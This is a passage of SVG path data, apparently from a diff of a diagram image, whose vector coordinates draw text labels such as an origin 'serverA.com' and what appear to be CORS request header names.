C134.537809,43.871873 134.084689,43.3419304 133.787812,42.6882813 C133.490936,42.0346321 133.3425,41.3067748 133.3425,40.5046875 C133.3425,39.8901011 133.431041,39.3119819 133.608125,38.7703125 C133.785209,38.2286431 134.036509,37.7494813 134.362031,37.3328125 C134.687553,36.9161438 135.10682,36.58672 135.619843,36.3445313 C136.132867,36.1023425 136.704476,35.98125 137.334687,35.98125 C137.746148,35.98125 138.1563,36.035937 138.565156,36.1453125 C138.974012,36.254688 139.277395,36.3848951 139.475312,36.5359375 L139.170625,37.2625 C138.634164,36.9604152 137.998753,36.809375 137.264375,36.809375 C136.373745,36.809375 135.668023,37.1466112 135.147187,37.8210938 C134.626351,38.4955763 134.365937,39.3900986 134.365937,40.5046875 C134.365937,41.5724012 134.625049,42.4356738 135.143281,43.0945313 C135.661513,43.7533887 136.368537,44.0828125 137.264375,44.0828125 C137.889378,44.0828125 138.561246,43.9265641 139.28,43.6140625 L139.428437,44.309375 C139.183644,44.4916676 138.865939,44.6335932 138.475312,44.7351563 C138.084685,44.8367193 137.694064,44.8875 137.303437,44.8875 Z M145.617812,44.1140625 C146.242815,44.1140625 146.770154,43.9486996 147.199843,43.6179688 C147.629533,43.2872379 147.94203,42.8510444 148.137343,42.309375 C148.332657,41.7677056 148.430312,41.145316 148.430312,40.4421875 C148.430312,39.3380153 148.19594,38.4500034 147.727187,37.778125 C147.258435,37.1062466 146.5449,36.7703125 145.586562,36.7703125 C144.961559,36.7703125 144.429012,36.9382796 143.988906,37.2742188 C143.5488,37.6101579 143.227188,38.0502577 143.024062,38.5945313 C142.820936,39.1388048 142.719375,39.7624965 142.719375,40.465625 C142.719375,41.5333387 142.96807,42.4083299 143.465468,43.090625 C143.962867,43.7729201 144.680308,44.1140625 145.617812,44.1140625 Z M145.5475,44.8875 C144.771454,44.8875 144.087867,44.6921895 143.496718,44.3015625 C142.90557,43.9109355 142.455053,43.3809929 142.145156,42.7117188 C141.835259,42.0424446 141.680312,41.2859417 141.680312,40.4421875 C141.680312,39.8067677 141.770155,39.2169298 141.949843,38.6726563 C142.129532,38.1283827 142.38604,37.6570332 142.719375,37.2585938 C143.05271,36.8601543 143.466768,36.5476574 143.961562,36.3210938 C144.456356,36.0945301 145.00583,35.98125 145.61,35.98125 C146.412087,35.98125 147.107393,36.1778626 147.695937,36.5710938 C148.284482,36.9643249 148.725884,37.4929654 149.020156,38.1570313 C149.314428,38.8210971 149.461562,39.5775999 149.461562,40.4265625 C149.461562,41.2807334 149.310522,42.0411425 149.008437,42.7078125 C148.706352,43.3744825 148.255836,43.9044251 147.656875,44.2976563 C147.057913,44.6908874 146.354795,44.8875 145.5475,44.8875 Z M152.22125,44.7 C152.205625,39.5228908 152.197812,36.6687527 152.197812,36.1375 L153.041562,36.1375 L153.166562,37.45 C153.416563,37.0229145 153.790258,36.6713555 154.287656,36.3953125 C154.785054,36.1192695 155.312393,35.98125 155.869687,35.98125 C157.239486,35.98125 158.098852,36.5203071 158.447812,37.5984375 C159.05719,36.5203071 160.018118,35.98125 161.330625,35.98125 C162.268129,35.98125 162.956925,36.2481744 163.397031,36.7820313 C163.837137,37.3158881 164.057187,38.111453 164.057187,39.16875 L164.057187,44.7 L163.088437,44.7 L163.088437,40.5125 C163.088437,40.1166647 163.083229,39.7859388 163.072812,39.5203125 C163.062395,39.2546862 163.037656,38.9656266 162.998593,38.653125 C162.959531,38.3406234 162.899636,38.0854177 162.818906,37.8875 C162.738176,37.6895823 162.632709,37.5020842 162.5025,37.325 C162.372291,37.1479158 162.205626,37.0177088 162.0025,36.934375 C161.799374,36.8510413 161.559793,36.809375 161.28375,36.809375 C160.627496,36.809375 160.071512,37.0033835 159.615781,37.3914063 C159.16005,37.779429 158.843646,38.3249965 158.666562,39.028125 C158.676979,39.5593777 158.69,39.9708319 158.705625,40.2625 L158.705625,44.7 L157.744687,44.7 L157.744687,40.340625 C157.744687,39.8979145 157.731666,39.5138037 157.705625,39.1882813 C157.679583,38.8627588 157.6275,38.5437516 157.549375,38.23125 C157.471249,37.9187484 157.365782,37.6635427 157.232968,37.465625 C157.100155,37.2677073 156.923074,37.1088548 156.701718,36.9890625 C156.480363,36.8692702 156.216043,36.809375 155.90875,36.809375 C155.200413,36.809375 154.607971,36.9981752 154.131406,37.3757813 C153.654841,37.7533873 153.34625,38.2677051 153.205625,38.91875 C153.195208,39.1322927 153.19,39.4369772 153.19,39.8328125 L153.19,44.7 L152.22125,44.7 Z" id="ORIGIN:-serverA.com"></path>
+                    <path d="M0.046875,73.2 L4.5859375,61.575 L5.546875,61.575 L9.921875,73.2 L8.890625,73.2 L7.40625,69.2546875 L2.5859375,69.2546875 L1.0390625,73.2 L0.046875,73.2 Z M2.96875,68.5203125 L7.046875,68.5203125 C5.87499414,65.1557123 5.21093828,63.1765655 5.0546875,62.5828125 C4.99218719,62.8119803 4.78646008,63.4213492 4.4375,64.4109375 C4.08853992,65.4005258 3.75520992,66.3328081 3.4375,67.2078125 L2.96875,68.5203125 Z M15.5175,73.3875 C14.6893708,73.3875 13.970628,73.184377 13.36125,72.778125 C12.7518719,72.371873 12.2987515,71.8419304 12.001875,71.1882813 C11.7049985,70.5346321 11.5565625,69.8067748 11.5565625,69.0046875 C11.5565625,68.3901011 11.6451033,67.8119819 11.8221875,67.2703125 C11.9992717,66.7286431 12.2505713,66.2494813 12.5760937,65.8328125 C12.9016162,65.4161438 13.3208828,65.08672 13.8339062,64.8445313 C14.3469296,64.6023425 14.9185385,64.48125 15.54875,64.48125 C15.9602104,64.48125 16.3703625,64.535937 16.7792187,64.6453125 C17.1880749,64.754688 17.4914573,64.8848951 17.689375,65.0359375 L17.3846875,65.7625 C16.8482265,65.4604152 16.2128162,65.309375 15.4784375,65.309375 C14.587808,65.309375 13.8820859,65.6466112 13.36125,66.3210938 C12.840414,66.9955763 12.58,67.8900986 12.58,69.0046875 C12.58,70.0724012 12.839112,70.9356738 13.3573437,71.5945313 C13.8755755,72.2533887 14.5825997,72.5828125 15.4784375,72.5828125 C16.1034406,72.5828125 16.7753089,72.4265641 17.4940625,72.1140625 L17.6425,72.809375 C17.3977071,72.9916676 17.0800019,73.1335932 16.689375,73.2351563 C16.298748,73.3367193 15.9081269,73.3875 15.5175,73.3875 Z M23.7615625,73.3875 C22.9334333,73.3875 22.2146905,73.184377 21.6053125,72.778125 C20.9959344,72.371873 20.542814,71.8419304 20.2459375,71.1882813 C19.949061,70.5346321 19.800625,69.8067748 19.800625,69.0046875 C19.800625,68.3901011 19.8891657,67.8119819 20.06625,67.2703125 C20.2433342,66.7286431 20.4946338,66.2494813 20.8201562,65.8328125 C21.1456787,65.4161438 21.5649453,65.08672 22.0779687,64.8445313 C22.5909921,64.6023425 23.162601,64.48125 23.7928125,64.48125 C24.2042729,64.48125 24.614425,64.535937 25.0232812,64.6453125 C25.4321374,64.754688 25.7355198,64.8848951 25.9334375,65.0359375 L25.62875,65.7625 C25.092289,65.4604152 24.4568786,65.309375 23.7225,65.309375 C22.8318705,65.309375 22.1261484,65.6466112 21.6053125,66.3210938 C21.0844765,66.9955763 20.8240625,67.8900986 20.8240625,69.0046875 C20.8240625,70.0724012 21.0831745,70.9356738 21.6014062,71.5945313 C22.119638,72.2533887 22.8266622,72.5828125 23.7225,72.5828125 C24.3475031,72.5828125 25.0193714,72.4265641 25.738125,72.1140625 L25.8865625,72.809375 C25.6417696,72.9916676 25.3240644,73.1335932 24.9334375,73.2351563 C24.5428105,73.3367193 24.1521894,73.3875 23.7615625,73.3875 Z M31.9978124,73.3875 C30.8155149,73.3875 29.8767222,72.9916706 29.1814062,72.2 C28.4860902,71.4083294 28.1384374,70.3354234 28.1384374,68.98125 C28.1384374,67.6739518 28.4782778,66.60365 29.1579687,65.7703125 C29.8376596,64.936975 30.7165571,64.5072918 31.7946874,64.48125 C32.7999008,64.48125 33.6071844,64.8406214 34.2165624,65.559375 C34.8259405,66.2781286 35.1306249,67.2416606 35.1306249,68.45 C35.1306249,68.4968752 35.1293229,68.5919264 35.1267187,68.7351563 C35.1241145,68.8783861 35.1228124,68.9786455 35.1228124,69.0359375 L29.1618749,69.0359375 C29.1722917,70.1349013 29.437914,71.0059864 29.9587499,71.6492188 C30.4795859,72.2924511 31.167079,72.6140625 32.0212499,72.6140625 C32.5785444,72.6140625 33.0629146,72.548959 33.4743749,72.41875 C33.8858353,72.288541 34.3155185,72.103647 34.7634374,71.8640625 L34.9274999,72.590625 C34.0629123,73.1218777 33.0863596,73.3875 31.9978124,73.3875 Z M29.2009374,68.2546875 L34.0759374,68.2546875 C34.0759374,67.3015577 33.8702103,66.5710963 33.4587499,66.0632813 C33.0472896,65.5554662 32.482191,65.3015625 31.7634374,65.3015625 C31.0342671,65.3015625 30.4457314,65.5723931 29.9978124,66.1140625 C29.5498935,66.6557319 29.2842712,67.3692664 29.2009374,68.2546875 Z M40.3981249,73.3953125 C39.8460388,73.3953125 39.3278149,73.3276048 38.8434374,73.1921875 C38.35906,73.0567702 37.9762513,72.8953134 37.6949999,72.7078125 L37.8356249,71.8953125 C38.6950042,72.3432314 39.5179127,72.5671875 40.3043749,72.5671875 C41.7158403,72.5671875 42.4476038,72.0437552 42.4996874,70.996875 C42.4996874,70.5593728 42.3577618,70.2156263 42.0739062,69.965625 C41.7900506,69.7156238 41.2210459,69.4552097 40.3668749,69.184375 C39.918956,69.0281242 39.6715627,68.9421876 39.6246874,68.9265625 C38.2861391,68.5203105 37.6116667,67.7989635 37.6012499,66.7625 C37.6012499,66.1635387 37.8655702,65.6335961 38.3942187,65.1726563 C38.9228672,64.7117164 39.6377038,64.48125 40.5387499,64.48125 C41.4397961,64.48125 42.2861418,64.6583316 43.0778124,65.0125 L42.7496874,65.73125 C41.9476001,65.4291652 41.2028159,65.278125 40.5153124,65.278125 C39.9111427,65.278125 39.4358871,65.4135403 39.0895312,65.684375 C38.7431753,65.9552097 38.5699999,66.3197894 38.5699999,66.778125 C38.5699999,67.1635436 38.6832801,67.4591136 38.9098437,67.6648438 C39.1364073,67.8705739 39.5856216,68.0671866 40.2574999,68.2546875 C40.330417,68.2755209 40.4645302,68.3223955 40.6598437,68.3953125 C40.8551572,68.4682295 40.963229,68.5072916 40.9840624,68.5125 C41.8851086,68.788543 42.5140086,69.1153627 42.8707812,69.4929688 C43.2275538,69.8705748 43.4059374,70.3848926 43.4059374,71.0359375 C43.3903124,71.7859413 43.1103672,72.3666646 42.5660937,72.778125 C42.0218201,73.1895854 41.2991711,73.3953125 40.3981249,73.3953125 Z M48.6031249,73.3953125 C48.0510388,73.3953125 47.5328148,73.3276048 47.0484374,73.1921875 C46.56406,73.0567702 46.1812513,72.8953134 45.8999999,72.7078125 L46.0406249,71.8953125 C46.9000042,72.3432314 47.7229127,72.5671875 48.5093749,72.5671875 C49.9208403,72.5671875 50.6526038,72.0437552 50.7046874,70.996875 C50.7046874,70.5593728 50.5627618,70.2156263 50.2789062,69.965625 C49.9950506,69.7156238 49.4260459,69.4552097 48.5718749,69.184375 C48.123956,69.0281242 47.8765627,68.9421876 47.8296874,68.9265625 C46.4911391,68.5203105 45.8166666,67.7989635 45.8062499,66.7625 C45.8062499,66.1635387 46.0705702,65.6335961 46.5992187,65.1726563 C47.1278671,64.7117164 47.8427037,64.48125 48.7437499,64.48125 C49.6447961,64.48125 50.4911418,64.6583316 51.2828124,65.0125 L50.9546874,65.73125 C50.1526001,65.4291652 49.4078159,65.278125 48.7203124,65.278125 C48.1161427,65.278125 47.6408871,65.4135403 47.2945312,65.684375 C46.9481753,65.9552097 46.7749999,66.3197894 46.7749999,66.778125 C46.7749999,67.1635436 46.88828,67.4591136 47.1148437,67.6648438 C47.3414073,67.8705739 47.7906216,68.0671866 48.4624999,68.2546875 C48.5354169,68.2755209 48.6695302,68.3223955 48.8648437,68.3953125 C49.0601571,68.4682295 49.168229,68.5072916 49.1890624,68.5125 C50.0901086,68.788543 50.7190085,69.1153627 51.0757812,69.4929688 C51.4325538,69.8705748 51.6109374,70.3848926 51.6109374,71.0359375 C51.5953123,71.7859413 51.3153672,72.3666646 50.7710937,72.778125 C50.2268201,73.1895854 49.5041711,73.3953125 48.6031249,73.3953125 Z M53.8862499,69.0515625 L53.8862499,68.1921875 L57.6674999,68.1921875 L57.6674999,69.0515625 L53.8862499,69.0515625 Z M65.5756249,73.3796875 C64.6849954,73.3796875 63.8907325,73.2273453 63.1928124,72.9226563 C62.4948922,72.6179672 61.9258875,72.1947944 61.4857811,71.653125 C61.0456748,71.1114556 60.7123448,70.4760453 60.4857811,69.746875 C60.2592175,69.0177047 60.1459374,68.2182335 60.1459374,67.3484375 C60.1459374,66.1921817 60.3581748,65.1674524 60.7826561,64.2742188 C61.2071374,63.3809851 61.8412457,62.6739609 62.6849999,62.153125 C63.5287541,61.6322891 64.52614,61.371875 65.6771874,61.371875 C66.9428187,61.371875 68.0209329,61.6374973 68.9115624,62.16875 L68.4349999,62.9421875 C67.6224958,62.4526017 66.7058383,62.2078125 65.6849999,62.2078125 C64.9714546,62.2078125 64.3308361,62.3419257 63.7631249,62.6101563 C63.1954137,62.8783868 62.7305746,63.2494768 62.3685936,63.7234375 C62.0066127,64.1973982 61.7305738,64.7468719 61.5404686,65.371875 C61.3503635,65.9968781 61.2553124,66.6739547 61.2553124,67.403125 C61.2553124,68.1166702 61.3425511,68.7768199 61.5170311,69.3835938 C61.6915112,69.9903676 61.9545294,70.5320289 62.3060936,71.0085938 C62.6576579,71.4851586 63.1251011,71.8601549 63.7084374,72.1335938 C64.2917736,72.4070326 64.9636419,72.54375 65.7240624,72.54375 C66.5417748,72.54375 67.453224,72.3171898 68.4584374,71.8640625 L68.6615624,72.66875 C67.9011419,73.1427107 66.8725064,73.3796875 65.5756249,73.3796875 Z M74.7962499,72.6140625 C75.421253,72.6140625 75.9485915,72.4486996 76.3782811,72.1179688 C76.8079708,71.7872379 77.1204676,71.3510444 77.3157811,70.809375 C77.5110946,70.2677056 77.6087499,69.645316 77.6087499,68.9421875 C77.6087499,67.8380153 77.3743772,66.9500034 76.9056249,66.278125 C76.4368725,65.6062466 75.723338,65.2703125 74.7649999,65.2703125 C74.1399967,65.2703125 73.60745,65.4382796 73.1673436,65.7742188 C72.7272372,66.1101579 72.4056259,66.5502577 72.2024999,67.0945313 C71.9993739,67.6388048 71.8978124,68.2624965 71.8978124,68.965625 C71.8978124,70.0333387 72.1465078,70.9083299 72.6439061,71.590625 C73.1413044,72.2729201 73.8587452,72.6140625 74.7962499,72.6140625 Z M74.7259374,73.3875 C73.9498918,73.3875 73.2663049,73.1921895 72.6751561,72.8015625 C72.0840073,72.4109355 71.633491,71.8809929 71.3235936,71.2117188 C71.0136962,70.5424446 70.8587499,69.7859417 70.8587499,68.9421875 C70.8587499,68.3067677 70.9485927,67.7169298 71.1282811,67.1726563 C71.3079695,66.6283827 71.5644774,66.1570332 71.8978124,65.7585938 C72.2311474,65.3601543 72.6452057,65.0476574 73.1399999,64.8210938 C73.634794,64.5945301 74.1842677,64.48125 74.7884374,64.48125 C75.5905247,64.48125 76.2858303,64.6778626 76.8743749,65.0710938 C77.4629195,65.4643249 77.9043213,65.9929654 78.1985936,66.6570313 C78.4928659,67.3210971 78.6399999,68.0775999 78.6399999,68.9265625 C78.6399999,69.7807334 78.4889597,70.5411425 78.1868749,71.2078125 C77.88479,71.8744825 77.4342737,72.4044251 76.8353124,72.7976563 C76.236351,73.1908874 75.5332331,73.3875 74.7259374,73.3875 Z M81.3762498,73.2 L81.3762498,64.6375 L82.2199998,64.6375 L82.3528123,65.9578125 C82.6601056,65.4994769 83.0728618,65.1388034 83.5910936,64.8757813 C84.1093254,64.6127591 84.6679135,64.48125 85.2668748,64.48125 C86.2512548,64.48125 86.9752059,64.7520806 87.4387498,65.29375 C87.9022938,65.8354194 88.1340623,66.6999941 88.1340623,67.8875 L88.1340623,73.2 L87.1574998,73.2 L87.1574998,67.45 C87.1314581,66.6895795 86.9700013,66.14271 86.6731248,65.809375 C86.3762484,65.47604 85.8892741,65.309375 85.2121873,65.309375 C84.4361418,65.309375 83.8020336,65.5046855 83.3098436,65.8953125 C82.8176536,66.2859395 82.509063,66.7911427 82.3840623,67.4109375 C82.3632289,67.6557304 82.3528123,67.9109362 82.3528123,68.1765625 L82.3528123,73.2 L81.3762498,73.2 Z M93.6203123,73.3796875 C92.9015587,73.3796875 92.3755223,73.2169287 92.0421873,72.8914063 C91.7088523,72.5658838 91.5421873,72.0359412 91.5421873,71.3015625 L91.5421873,65.3484375 L90.3312498,65.3484375 L90.4015623,64.7625 L91.5578123,64.653125 L91.8156248,62.6921875 L92.4953123,62.6453125 L92.4953123,64.6375 L94.9953123,64.6375 L94.9953123,65.3484375 L92.4953123,65.3484375 L92.4953123,71.0984375 C92.4953123,71.7026072 92.5942697,72.1075511 92.7921873,72.3132813 C92.990105,72.5190114 93.3390598,72.621875 93.8390623,72.621875 C94.1619806,72.621875 94.5630183,72.5619798 95.0421873,72.4421875 L95.0812498,73.1921875 C94.4510383,73.3171881 93.9640641,73.3796875 93.6203123,73.3796875 Z M97.3331248,73.2 C97.3227081,68.1739332 97.3174998,65.3197951 97.3174998,64.6375 L98.1143748,64.6375 L98.1768748,66.325 C98.484168,65.8145808 98.8747891,65.3979183 99.3487498,65.075 C99.8227105,64.7520817 100.317497,64.590625 100.833125,64.590625 C101.046668,64.590625 101.275832,64.608854 101.520625,64.6453125 L101.450312,65.45 C101.262811,65.4187498 101.064897,65.403125 100.856562,65.403125 C100.1326,65.403125 99.5245335,65.6882784 99.0323436,66.2585938 C98.5401536,66.8289091 98.2940623,67.5046836 98.2940623,68.2859375 L98.2940623,73.2 L97.3331248,73.2 Z M107.131875,72.6140625 C107.756878,72.6140625 108.284216,72.4486996 108.713906,72.1179688 C109.143596,71.7872379 109.456093,71.3510444 109.651406,70.809375 C109.84672,70.2677056 109.944375,69.645316 109.944375,68.9421875 C109.944375,67.8380153 109.710002,66.9500034 109.24125,66.278125 C108.772497,65.6062466 108.058963,65.2703125 107.100625,65.2703125 C106.475622,65.2703125 105.943075,65.4382796 105.502969,65.7742188 C105.062862,66.1101579 104.741251,66.5502577 104.538125,67.0945313 C104.334999,67.6388048 104.233437,68.2624965 104.233437,68.965625 C104.233437,70.0333387 104.482133,70.9083299 104.979531,71.590625 C105.476929,72.2729201 106.19437,72.6140625 107.131875,72.6140625 Z M107.061562,73.3875 C106.285517,73.3875 105.60193,73.1921895 105.010781,72.8015625 C104.419632,72.4109355 103.969116,71.8809929 103.659219,71.2117188 C103.349321,70.5424446 103.194375,69.7859417 103.194375,68.9421875 C103.194375,68.3067677 103.284218,67.7169298 103.463906,67.1726563 C103.643594,66.6283827 103.900102,66.1570332 104.233437,65.7585938 C104.566772,65.3601543 104.980831,65.0476574 105.475625,64.8210938 C105.970419,64.5945301 106.519893,64.48125 107.124062,64.48125 C107.92615,64.48125 108.621455,64.6778626 109.21,65.0710938 C109.798544,65.4643249 110.239946,65.9929654 110.534219,66.6570313 C110.828491,67.3210971 110.975625,68.0775999 110.975625,68.9265625 C110.975625,69.7807334 110.824585,70.5411425 110.5225,71.2078125 C110.220415,71.8744825 109.769899,72.4044251 109.170937,72.7976563 C108.571976,73.1908874 107.868858,73.3875 107.061562,73.3875 Z M115.868125,73.3796875 C115.149371,73.3796875 114.623335,73.2169287 114.29,72.8914063 C113.956665,72.5658838 113.79,72.0359412 113.79,71.3015625 L113.79,61.309375 L114.743125,61.23125 L114.743125,71.246875 C114.743125,71.7677109 114.838176,72.1270823 115.028281,72.325 C115.218386,72.5229177 115.506144,72.621875 115.891562,72.621875 C116.204064,72.621875 116.594685,72.5619798 117.063437,72.4421875 L117.1025,73.1921875 C116.592081,73.3171881 116.180626,73.3796875 115.868125,73.3796875 Z M118.659062,69.0515625 L118.659062,68.1921875 L122.440312,68.1921875 L122.440312,69.0515625 L118.659062,69.0515625 Z M125.41875,73.2 L125.41875,61.575 L128.73125,61.575 C129.153127,61.575 129.519009,61.5828124 129.828906,61.5984375 C130.138803,61.6140626 130.455206,61.6479164 130.778125,61.7 C131.101043,61.7520836 131.37578,61.8210933 131.602343,61.9070313 C131.828907,61.9929692 132.045051,62.1088534 132.250781,62.2546875 C132.456511,62.4005216 132.621874,62.5763011 132.746875,62.7820313 C132.871875,62.9877614 132.969531,63.2338527 133.039843,63.5203125 C133.110156,63.8067723 133.145312,64.1322898 133.145312,64.496875 C133.145312,65.2104202 132.970835,65.8223933 132.621875,66.3328125 C132.272915,66.8432317 131.739066,67.1895824 131.020312,67.371875 C131.332814,68.0125032 131.567186,68.4994775 131.723437,68.8328125 L133.629687,73.2 L132.465625,73.2 L130.825,69.2234375 C130.715624,68.9630195 130.470835,68.4005252 130.090625,67.5359375 C129.986458,67.5515626 129.601045,67.559375 128.934375,67.559375 L126.41875,67.5125 L126.41875,73.2 L125.41875,73.2 Z M129.364062,66.73125 C130.400526,66.73125 131.124477,66.5502622 131.535937,66.1882813 C131.947398,65.8263003 132.153125,65.2677121 132.153125,64.5125 C132.153125,63.8354133 131.966929,63.3158872 131.594531,62.9539063 C131.222133,62.5919253 130.588025,62.4109375 129.692187,62.4109375 L126.41875,62.4109375 L126.41875,66.7078125 C127.642714,66.7234376 128.624475,66.73125 129.364062,66.73125 Z M139.858125,73.3875 C138.675827,73.3875 137.737034,72.9916706 137.041718,72.2 C136.346403,71.4083294 135.99875,70.3354234 135.99875,68.98125 C135.99875,67.6739518 136.33859,66.60365 137.018281,65.7703125 C137.697972,64.936975 138.576869,64.5072918 139.655,64.48125 C140.660213,64.48125 141.467497,64.8406214 142.076875,65.559375 C142.686253,66.2781286 142.990937,67.2416606 142.990937,68.45 C142.990937,68.4968752 142.989635,68.5919264 142.987031,68.7351563 C142.984427,68.8783861 142.983125,68.9786455 142.983125,69.0359375 L137.022187,69.0359375 C137.032604,70.1349013 137.298226,71.0059864 137.819062,71.6492188 C138.339898,72.2924511 139.027391,72.6140625 139.881562,72.6140625 C140.438857,72.6140625 140.923227,72.548959 141.334687,72.41875 C141.746148,72.288541 142.175831,72.103647 142.62375,71.8640625 L142.787812,72.590625 C141.923225,73.1218777 140.946672,73.3875 139.858125,73.3875 Z M137.06125,68.2546875 L141.93625,68.2546875 C141.93625,67.3015577 141.730523,66.5710963 141.319062,66.0632813 C140.907602,65.5554662 140.342503,65.3015625 139.62375,65.3015625 C138.894579,65.3015625 138.306044,65.5723931 137.858125,66.1140625 C137.410206,66.6557319 137.144583,67.3692664 137.06125,68.2546875 Z M151.70375,77.0125 L151.70375,73.0984375 C151.70375,72.6609353 151.71677,72.2651059 151.742812,71.9109375 C151.440727,72.3953149 151.027971,72.7624988 150.504531,73.0125 C149.981091,73.2625013 149.458961,73.3875 148.938125,73.3875 C148.188121,73.3875 147.53969,73.1973977 146.992812,72.8171875 C146.445934,72.4369773 146.038386,71.9226595 145.770156,71.2742188 C145.501925,70.625778 145.367812,69.8822959 145.367812,69.04375 C145.367812,68.1427038 145.501925,67.3536492 145.770156,66.6765625 C146.038386,65.9994758 146.449841,65.4643249 147.004531,65.0710938 C147.559221,64.6778626 148.224579,64.48125 149.000625,64.48125 C150.068338,64.48125 150.982392,64.963016 151.742812,65.9265625 L151.805312,64.6375 L152.6725,64.6375 L152.6725,76.9578125 L151.70375,77.0125 Z M148.938125,72.54375 C150.740217,72.54375 151.65427,71.395324 151.680312,69.0984375 C151.680312,68.5151013 151.632136,67.9994814 151.535781,67.5515625 C151.439426,67.1036436 151.287084,66.7091163 151.07875,66.3679688 C150.870415,66.0268212 150.586564,65.7664071 150.227187,65.5867188 C149.86781,65.4070304 149.435523,65.3171875 148.930312,65.3171875 C148.560519,65.3171875 148.228491,65.3874993 147.934218,65.528125 C147.639946,65.6687507 147.399063,65.8562488 147.211562,66.090625 C147.024061,66.3250012 146.866511,66.6010401 146.738906,66.91875 C146.611301,67.2364599 146.521458,67.5632796 146.469375,67.8992188 C146.417291,68.2351579 146.39125,68.5854148 146.39125,68.95 C146.39125,69.4343774 146.43552,69.8822896 146.524062,70.29375 C146.612604,70.7052104 146.751926,71.0841129 146.942031,71.4304688 C147.132136,71.7768246 147.397758,72.0489573 147.738906,72.246875 C148.080054,72.4447927 148.479789,72.54375 148.938125,72.54375 Z M158.986875,73.4109375 C158.538956,73.4109375 158.123595,73.3601568 157.740781,73.2585938 C157.357967,73.1570307 157.002501,72.9981782 156.674375,72.7820313 C156.346248,72.5658843 156.087136,72.2598978 155.897031,71.8640625 C155.706926,71.4682272 155.611875,71.002086 155.611875,70.465625 L155.611875,64.6375 L156.580625,64.6375 L156.580625,70.4890625 C156.580625,70.8953145 156.643124,71.2390611 156.768125,71.5203125 C156.893125,71.8015639 157.072811,72.0138014 157.307187,72.1570313 C157.541563,72.3002611 157.791561,72.4005205 158.057187,72.4578125 C158.322814,72.5151045 158.632706,72.54375 158.986875,72.54375 C159.335835,72.54375 159.643123,72.5138024 159.90875,72.4539063 C160.174376,72.3940101 160.421769,72.2911466 160.650937,72.1453125 C160.880105,71.9994784 161.055885,71.787241 161.178281,71.5085938 C161.300677,71.2299465 161.361875,70.8901062 161.361875,70.4890625 L161.361875,64.6375 L162.330625,64.6375 L162.330625,70.465625 C162.330625,70.9031272 162.268125,71.2937483 162.143125,71.6375 C162.018124,71.9812517 161.851459,72.2624989 161.643125,72.48125 C161.43479,72.7000011 161.183491,72.8809889 160.889218,73.0242188 C160.594946,73.1674486 160.292866,73.267708 159.982968,73.325 C159.673071,73.382292 159.341043,73.4109375 158.986875,73.4109375 Z M168.73875,73.3875 C167.556452,73.3875 166.617659,72.9916706 165.922343,72.2 C165.227027,71.4083294 164.879375,70.3354234 164.879375,68.98125 C164.879375,67.6739518 165.219215,66.60365 165.898906,65.7703125 C166.578597,64.936975 167.457494,64.5072918 168.535625,64.48125 C169.540838,64.48125 170.348122,64.8406214 170.9575,65.559375 C171.566878,66.2781286 171.871562,67.2416606 171.871562,68.45 C171.871562,68.4968752 171.87026,68.5919264 171.867656,68.7351563 C171.865052,68.8783861 171.86375,68.9786455 171.86375,69.0359375 L165.902812,69.0359375 C165.913229,70.1349013 166.178851,71.0059864 166.699687,71.6492188 C167.220523,72.2924511 167.908016,72.6140625 168.762187,72.6140625 C169.319482,72.6140625 169.803852,72.548959 170.215312,72.41875 C170.626773,72.288541 171.056456,72.103647 171.504375,71.8640625 L171.668437,72.590625 C170.80385,73.1218777 169.827297,73.3875 168.73875,73.3875 Z M165.941875,68.2546875 L170.816875,68.2546875 C170.816875,67.3015577 170.611148,66.5710963 170.199687,66.0632813 C169.788227,65.5554662 169.223128,65.3015625 168.504375,65.3015625 C167.775204,65.3015625 167.186669,65.5723931 166.73875,66.1140625 C166.290831,66.6557319 166.025208,67.3692664 165.941875,68.2546875 Z M177.139062,73.3953125 C176.586976,73.3953125 176.068752,73.3276048 175.584375,73.1921875 C175.099997,73.0567702 174.717189,72.8953134 174.435937,72.7078125 L174.576562,71.8953125 C175.435941,72.3432314 176.25885,72.5671875 177.045312,72.5671875 C178.456778,72.5671875 179.188541,72.0437552 179.240625,70.996875 C179.240625,70.5593728 179.098699,70.2156263 178.814843,69.965625 C178.530988,69.7156238 177.961983,69.4552097 177.107812,69.184375 C176.659893,69.0281242 176.4125,68.9421876 176.365625,68.9265625 C175.027076,68.5203105 174.352604,67.7989635 174.342187,66.7625 C174.342187,66.1635387 174.606507,65.6335961 175.135156,65.1726563 C175.663804,64.7117164 176.378641,64.48125 177.279687,64.48125 C178.180733,64.48125 179.027079,64.6583316 179.81875,65.0125 L179.490625,65.73125 C178.688537,65.4291652 177.943753,65.278125 177.25625,65.278125 C176.65208,65.278125 176.176824,65.4135403 175.830468,65.684375 C175.484113,65.9552097 175.310937,66.3197894 175.310937,66.778125 C175.310937,67.1635436 175.424217,67.4591136 175.650781,67.6648438 C175.877345,67.8705739 176.326559,68.0671866 176.998437,68.2546875 C177.071354,68.2755209 177.205467,68.3223955 177.400781,68.3953125 C177.596094,68.4682295 177.704166,68.5072916 177.725,68.5125 C178.626046,68.788543 179.254946,69.1153627 179.611718,69.4929688 C179.968491,69.8705748 180.146875,70.3848926 180.146875,71.0359375 C180.13125,71.7859413 179.851304,72.3666646 179.307031,72.778125 C178.762757,73.1895854 178.040108,73.3953125 177.139062,73.3953125 Z M185.258125,73.3796875 C184.539371,73.3796875 184.013335,73.2169287 183.68,72.8914063 C183.346665,72.5658838 183.18,72.0359412 183.18,71.3015625 L183.18,65.3484375 L181.969062,65.3484375 L182.039375,64.7625 L183.195625,64.653125 L183.453437,62.6921875 L184.133125,62.6453125 L184.133125,64.6375 L186.633125,64.6375 L186.633125,65.3484375 L184.133125,65.3484375 L184.133125,71.0984375 C184.133125,71.7026072 184.232082,72.1075511 184.43,72.3132813 C184.627917,72.5190114 184.976872,72.621875 185.476875,72.621875 C185.799793,72.621875 186.200831,72.5619798 186.68,72.4421875 L186.719062,73.1921875 C186.088851,73.3171881 185.601876,73.3796875 185.258125,73.3796875 Z M188.533437,69.0515625 L188.533437,68.1921875 L192.314687,68.1921875 L192.314687,69.0515625 L188.533437,69.0515625 Z M195.293125,73.2 L195.293125,61.575 L196.699375,61.575 L201.004062,71.3953125 L205.191562,61.575 L206.543125,61.575 L206.543125,73.2 L205.550937,73.2 L205.550937,65.3796875 L205.605625,62.7390625 L205.316562,63.6765625 L201.49625,72.5359375 L200.4025,72.5359375 L196.535312,63.653125 L196.230625,62.715625 L196.285312,65.41875 L196.285312,73.2 L195.293125,73.2 Z M213.412187,73.3875 C212.22989,73.3875 211.291097,72.9916706 210.595781,72.2 C209.900465,71.4083294 209.552812,70.3354234 209.552812,68.98125 C209.552812,67.6739518 209.892652,66.60365 210.572343,65.7703125 C211.252034,64.936975 